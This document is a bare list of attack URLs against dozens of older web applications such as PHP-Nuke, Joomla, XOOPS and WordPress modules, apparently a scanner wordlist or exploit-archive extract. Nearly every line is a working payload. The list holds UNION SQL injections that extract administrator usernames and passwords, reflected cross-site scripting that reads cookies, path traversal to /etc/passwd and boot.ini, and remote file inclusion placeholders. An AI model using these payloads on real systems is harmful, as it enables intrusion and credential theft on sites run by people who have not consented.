/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202 
/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal
/docs/examples/handlervalidate.spy?x="><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
/spyce/examples/request.spy?name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
/spyce/examples/getpost.spy?Name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
/spyce/examples/formtag.spy?="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=&lt;/textarea&gt;<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
/spyce/examples/automaton.spy 
/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/* 
/index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/* 
/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* 
/ClassList.asp&Term=SQL
/GradebookStuScores.asp?GrdBk=SQL 
/index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(user
/modules.php?name=Classifieds&mode=Details&id=-0000/**/union+select/**/000,111,222,000,aid,5,6,pwd,8,9,10,11/**/from/**/nuke_authors/*where%20admin%202%20-4 
/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066 
/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/* 
/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/* 
/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/* 
/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** 
/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/** 
/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* 
/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION 
/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+f
/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* 
/index.php?option=com_wines&Itemid=S@BUN&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,use
/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(usernam
/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 
/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user 
/manager/xmedia.php?dir=theme/default/<script>alert("XSS")</script>&mode= 
/main.php?pageURL=[Evil_Code] 
//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg=<script>alert("xss");</script> 
//include/common/javascript/color_picker.php?&name=XSS&title=%3Cscript%3Ea=/Test%20XSS/;alert(a.source)%3C/script%3E 
/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor" name="feeedback" enctype="multipart/form-data"> <input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input type="hidden" name="maxCustom" value=""> <table cellpadding="3" cellspacing="0" border="0"> <tr><th colspan="2">Upload Form</th></tr> <tr><th>Comments 
/include/doc/index.php?page=../../www/oreon.conf.php
/include/doc/index.php?page=../../../../../etc/passwd
/include/doc/index.php?page=[Local File] 
/index.php?gallery=XSS 
/phpmytourney/sources/tourney/index.php?page=[Evil-Script] 
/index.php?pid=databasedump 
/modules.php?name=gaestebuch_v22&amp;func=edit&amp;id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 
/kcwiki-1_0-20051129/minimal/wiki.php?page=http
/kcwiki-1_0-20051129/simplest/wiki.php?page=http
/index.php?do=myprofile&tasks_perpage=<script>alert('DSecRG XSS')</script> http
/account-inbox.php?msg=<script>alert(document.co­okie)</script>&receiver=<username> 
/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 
/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd 
/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen-- 
/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 
/podcastgen-0.96.2/setup/set_permissions.php?scriptlang="><script>alert("XSS")</script
/modules.php?name=Yellow_Pages&file=viewdir&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
/[path]/index.php?page=[Sh3llAddress] 
/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,aid,3,4,5+from+nuke_authors
/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,pwd,3,4,5+from+nuke_authors
/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors 
/upload/popup.php?path="><script>alert("xss")</script>
/upload/test/dir2.php?path="><script>alert("xss")</script>
/upload/admin/upload.php?path="><script>alert("xss")</script>
/upload/dirxml.php?path="><script>alert("xss")</script>
/wp-admin/users.php?update=invite&inviteemail=>< iframe src=http
/wp-admin/invites.php?result=sent&to=%22%3E%3Cscript%3Ealert
/SID_box_notns_path/taxonservice.php?dir=shell.txt?
/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
/showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
/pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 
/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,aid,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+nuke_authors
/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,pwd,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors
/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,email,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors 
/gallery/search.php?dosearch=true&query="><script>alert(document.cookie)</script>
/gallery/gadmin/index.php?task=add  (categori add)
/gallery/gadmin/users.php?task=edit&id=2 (user edit)
/gallery/gadmin/users.php?task=add (user add)
/index.php?search="><script>alert()</script>
/index.php?d="><script>alert()</script>
/thumber.php?dir="><script>alert()</script>
/describe.php?d="><script>alert()</script>
/addcomment.php?d="><script>alert()</script>
/install/index.php?d_root=/etc/passwd%00 
/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* 
/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 
/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** 
/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00 
/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00 
/downloadcenter/?nav=login&message="><script>alert(document.cookie)</script>
/downloadcenter/?nav=browse&category="><script>alert("xss")</script>
/downloadcenter/?nav=search_results&search="><script>alert(document.cookie)</script>
/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/* 
/Jeebles_Directory/?path="><script>alert()</script>
/Jeebles_Directory/?path=subdirectory/"><script>alert(document.cookie)</script>
/Jeebles_Directory/subdirectory/index.php?path="><script>alert(document.cookie)</script>
/Jeebles_Directory/index.php?administration&access_login=-1&access_password=<br%20/><b>Notice</b>
/modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*
/modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/* 
/index.php?sayfa=codeinject.txt 
/search.php?query="><h1>XSS</h1> 
/photo/index.php?directory="><script>alert(document.cookie)</script> 
/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* 
/phpstats/phpstats.php?baseDir=<script>alert(1)</script>&mode=run 
/eForum/busca.php
/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E&busca=%3Cscript%3Ealert(2)%3C/script%3E
/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E
/path/index.php?site=forum&board=">[XSS] 
/path/member.php?id='+union+select+password,2,3,4,5,6,7,8,9,10+from+myblog_users+/*
/path/post.php?id='+union+select+2,3,user,password,6,7,8,9,10,11,12+from+myblog_users/*
/path/vote.php?id='+union+select+password,3,4,5,6,7,8,9,10,11,12+from+myblog_users+/*
/path/vote.php?mid='+union+select+password,3,4,5,6,7,8,9,10+from+myblog_users+/*
/path/games.php?id=[shell]%00
/path/games.php?scoreid=[shell]%00 
/content/print/print.php?ide="><script>alert("CANAKKALE-GECiLMEZ")</script>
/content/print/print.php?file_name="><script>alert("CANAKKALE-GECiLMEZ")</script>
/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
/w-agora_path/add_user.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/create_forum.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/create_user.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/delete_notes.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/delete_user.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/edit_forum.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/mail_users.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/moderate_notes.php?bn_dir_default=ZoRLu.txt?
/w-agora_path/reorder_forums.php?bn_dir_default=ZoRLu.txt?
/chat/setup.php3?Lang="<xss> 
/mywebdocadd.php3?x
/mywebdoccalendaradd.php3?x
/mywebdoclisting.php3?x
/mywebdocchangepassword.php3?x
/mywebdocadduser.php3?x
/mywebdocuserlisting.php3?x 
/classes/class_admin.php?PathToComment=ZoRLu.txt?
/classes/class_comments.php?PathToComment=ZoRLu.txt? 
/index.php?PHPSESSID="><xss> 
/frontend/x/manpage.html?<xss> 
/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 
/QuickSystems_path/locate.php3?DOCUMENT_ROOT=ZoRLu.txt?,
/QuickSystems_path/search_results.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/classifieds/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/classifieds/view.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/manager.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/pass.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/remember.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/sign-up.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/userSet.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlcenter/verify.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/alterCats.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/alterFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/alterHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/alterNews.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/alterTheme.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/color_help.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createdb.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createL.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createM.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createNews.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createP.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createS.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/createT.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/mailadmin.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/controlpannel/setUp.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/include/sendit.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/include/sendit2.php3?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/include/adminHead.inc?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/include/usersHead.inc?DOCUMENT_ROOT=ZoRLu.txt?
/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt? 
/forum_path/fora-acc.php3?Fichier_Acceuil=ZoRLu.txt? 
/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/* 
/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/* 
/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/* 
/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd
/show.php?id=[XSS or RFI]
/search.php?id=[XSS or RFI]
/view.php?id=[XSS or RFI]
/forum.php?website=http
/forum.php?main_dir=http
/headlines.php?website=http
/headlines.php?main_dir=http
/main.php?website=http
/main.php?main_dir=http
/Sources/Subs-Graphics.php?settings[default_theme_dir]=http
/Sources/Themes.php?settings[theme_dir]=http
/[path]//pages/showtemplates.php?language=<script>alert(1111)</script>
/[path]//pages/editmailinglist_step1.php?language=<script>alert(222)</script>
/[path]/page/showcirculation.php?language=<script>alert(1111)</script>
/[path]/pages/edittemplate_step2.php?language=<script>alert(1111)</script>
/[path]//pages/showfields.php?language=<script>alert(1111)</script>
/[path]//pages/showuser.php?language=<script>alert(1111)</script>
/scripting/php/linklists/linklists/jax_linklists.php?do=list&list_id=0&language=german&cat="><script>alert()</script> 
/alexguestbook4/setup.php?language_setup="><script>alert()</script>
/alexguestbook4/index.php?mots_search=&rechercher=Ok&debut=0(=&skin=&test="><script>alert()</script>
/alex_poll2/setup.php?language_setup="><script>alert("CANAKKALE-GECiLMEZ")</script>
/scripting/php/guestbook/guestbook/jax_guestbook.php?language="><script>alert()</script> 
/phpg_kit_path/connexion.php?DOCUMENT_ROOT=ZoRLu.txt? 
/index.php?CurrentDirectory=FOLDER_420c142a1bebd1.90885049/../../../../../../../../../etc/&StartAt=12 
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=ZoRLu.txt?
/Easysite-2.0_path/configuration/image_editor.php?EASYSITE_BASE=ZoRLu.txt?
/Easysite-2.0_path/configuration/skin_chooser.php?EASYSITE_BASE=ZoRLu.txt? 
/index.php?choice="><script>alert("CANAKKALE-GECiLMEZ")</script> http
/index.php?option=com_lms&task=showTests&cat=-1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/* 
/[path]/admin.php?lang=<script>alert(document.c-o-o-k-i-e)</script>
/[path]/index.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/[path]/sess.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/[path]/stats.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/[path]/detail.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/[path]/resize.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/[path]/show.php?lang=<script>alert(document.c-o-o-k-i-e)</script
/poplar/index.php?genID=1&page=search&text="><script>alert("CANAKKALE-GECiLMEZ")</script>&ul=&start=0 http
/glossaire2.0/glossaire.php?mode=2&limit1=0&limit2=4&letter=">
/Path/index.php?mod=ConcoursPhoto&VIEW=[XSS] 
/RobotStats_path/graph.php?DOCUMENT_ROOT=ZoRLu.txt?
/RobotStats_path/robotstats.inc.php?DOCUMENT_ROOT=ZoRLu.txt? 
/index.php?PHPSESSID=d0de2085c36edc6b8a5db1e7e8538e3b&action=tpmod;sa=shoutbox;shouts=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3 
/Web_Server_Creator_path/news/include/createdb.php?langfile;=ZoRLu.txt? 
/URLStreet/seeurl.php?language="><script>alert("CANAKKALE-GECiLMEZ")</script> http
/wikepage/index.php?wiki=template=../../../../../../../../boot.ini  
/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*
/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/* 
/Path/index.php?option=com_puarcade&Itemid=1&gid=0 UNION SELECTpassword,username,0,0,0 from jos_users-- 
/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* 
/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body 
/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users 
/amfphp/browser/methodTable.php?class=[xss]
/amfphp/browser/code.php?class=[xss]
/amfphp/browser/code.php?action=&codeType=&class=[xss]&location=[xss]
/amfphp/browser/details.php?class=[xss] 
/[path]/index.php?ilang=http
/[forum]/read.php?data=http
/BS0.95/Blogator-script/bs_auth.php?msg=[XSS]
/MyBoard/rep.php?id=[XSS] 
/stats/admin.php?action=systems&mode=0&sel_anno=2008&sel_mese=[XSS]
/stats/admin.php?action=systems&mode=0&sel_anno=[XSS]
/EScontacts_path/EsContacts/add_groupe.php?msg=[XSS]
/EScontacts_path/EsContacts/contacts.php?msg=[XSS]
/EScontacts_path/EsContacts/groupes.php?msg=[XSS]
/EScontacts_path/EsContacts/importer.php?msg=[XSS]
/EScontacts_path/EsContacts/login.php?msg=[XSS]
/EScontacts_path/EsContacts/search.php?msg=[XSS] 
/timcms31/a-b-membres.php?action=Perso&nom=1'/**/union/**/select/**/0,1,2,3,4,5,6,US_uid,8,9,US_mail,11,12,13,14,15,US_pseudo,US_pwd,18,19,20,21,22,23/**/from/**/pphp_user/*
/tmcms31/goodies.php?act=lire&idnews=-1/**/union/**/select/**/0,1,2,US_pwd,US_pseudo,5,6,7,US_mail,9,10/**/from/**/pphp_user/*
/wikepage_2007_2/index.php?wiki=test%22%20onclick=%22alert(1)%22%20%20bla=%22
/wordpress/?cat=1.php/../searchform?
/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
/path/include/functions.inc.php?class=[Local File]
/path/include/common.inc.php?file=[Local File] 
/index.php?act=members&sortby=1&order=1&beg=[XSS]
/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt 
/horde/kronolith/addevent.php?timestamp=1208932200&url=[xss] 
/a/hive_v2.RC2/base.php?page=membres.php&mt=[XSS]
/phpnuke/upload_category/filename.html 
/upload/install/index.php?step="><script>alert()</script>
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode] 
/siteman2/index.php?module=[XSS] 
/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id
/install.php?etape=[XSS] 
/mjguest/mjguest.php?do=redirect&level=>"<[XSS] 
/pad/?username="<[XSS] 
/quicktalk/qtf_cmd.php?a=[XSS]
/quicktalk/qtf_ind_search_kw.php?title=[XSS]
/quicktalk/qtf_ind_search_ov.php?a=[XSS]
/quicktalk/qtf_ind_search_ov.php?a=user&id=2&n=[XSS]
/quicktalk/qtf_ind_search_ov.php?a=user&id=[XSS]
/quicktalk/qtf_ind_search_kw.php?title=adasdasdadasda&f=-1&al=0&at=0&s=[XSS]
/quicktalk/qtf_ind_stat.php?y=[XSS]
/quicktalk/qtf_ind_post.php?f=1&t=1[XSS]
/quicktalk/qtf_adm_cmd.php?a=[XSS] 
/blackbook/footer.php?bookCopyright=<script>alert(document.cookie)</script>
/blackbook/footer.php?ver=<script>alert(document.cookie)</script>
/blackbook/header.php?bookMetaTags="> <script>alert(document.cookie)</script>
/blackbook/header.php?estiloCSS="> <script>alert(document.cookie)</script>
/info.php?id=&#039;/**/union/**/select/**/1,2,3,concat(alumniUserName,0x3a,char(58),alumniPassword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/alumni_users/**/where/**/userType=0x61646d696e/*
/index.php?act=news&year=<script>alert(document.cookie)</script>
/ZenCart/index.php?main_page=advanced_search_result&search_in_description=1&zenid=bla&keyword=&#039; &#039; or 1
/ZenCart/index.php?main_page=advanced_search_result&search_in_description=1&zenid=bla&keyword=><script src=http
/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script> http
www.example.com/[sitexs]/adm/visual/upload.php',     
/GEDCOM_to_MySQL2/php/prenom.php?nom_branche=[XSS]
/GEDCOM_to_MySQL2/php/prenom.php?nom=[XSS]
/GEDCOM_to_MySQL2/php/index.php?nom_branche=[XSS]
/GEDCOM_to_MySQL2/php/info.php?nom_branche=[XSS]
/GEDCOM_to_MySQL2/php/info.php?nom=[XSS]
/GEDCOM_to_MySQL2/php/info.php?prenom=[XSS] 
/tlmcms_v1-1/tlmcms/index.php?affiche=Photo-Photo&ID=1'/**/union/**/select/**/0,1,concat(US_pwd),concat(US_pseudo),concat(US_mail)/**/from/**/pphp_user/*
/tlmcms_v1-1/tlmcms/index.php?affiche=Comment&act=lire&idnews=-99999999/**/union/**/select/**/0,1,concat(US_mail),concat(US_pseudo),concat(US_pwd),5,6,7,8,9,10/**/from/**/pphp_user/* 
/index.php?cmd=search&keywords="<script>alert(&#039;xss&#039;)</script>
/maian/upload/admin/index.php?cmd=search&process=1&keywords="<script>alert(&#039;xss&#039;)</script>
/admin/inc/header.php?msg_charset="<script>alert(&#039;xss&#039;)</script>
/admin/inc/header.php?msg_header9="<script>alert(&#039;xss&#039;)</script>
/admin/inc/header.php?msg_header9="<script>alert(&#039;xss&#039;)</script>
/[oscommerce]/categories.php?cPath=1_4&pID=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=new_product_preview&read=only http
/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar 
/qtofm.php?[shell.php.jpg]
/search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1 
/infusions/rank_system/forum.php?settings[locale]=../../../../../../../../etc/passwd%00
/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00 
/?q=>"><script>alert(document.cookie)</script> http
/scripts2/knowlegebase?issue=[INJECTION]&domain=
/scripts2/changeip?domain=any&user=[INJECTION]
/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30 
/index.php?act=sendmessage&user=admin[XSS] 
/vocourse.php?id=[SQL Injection] 
/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users--
/?page_id=[gallerypage]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users-- 
/index.php?do=details_posting&cat_id=5&posting_id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT(0x3C666F6E7420636F6C6F723D22726564223E,user_name,char(58),password,0x3C2F666F6E743E),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/FROM/**/admin_users/**/LIMIT/**/0,1/*
/phpInstantGallery/index.php?gallery=[XSS] 
/phpInstantGallery/image.php?gallery=1&imgnum=[XSS]
/phpInstantGallery/image.php?gallery=[XSS]
/CyrixMed_v1.4/index.php?msg_erreur=[XSS] 
/[PaTh]/claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=[Ev!l]
/[PaTh]/claroline/inc/lib/event/init_event_manager.inc.php?includePath=[Ev!l] 
/[PaTh]/fusebox5.php?FUSEBOX_APPLICATION_PATH=[EV!L] 
/[PaTh]/infoevent.php3?rootagenda=[EV!L] 
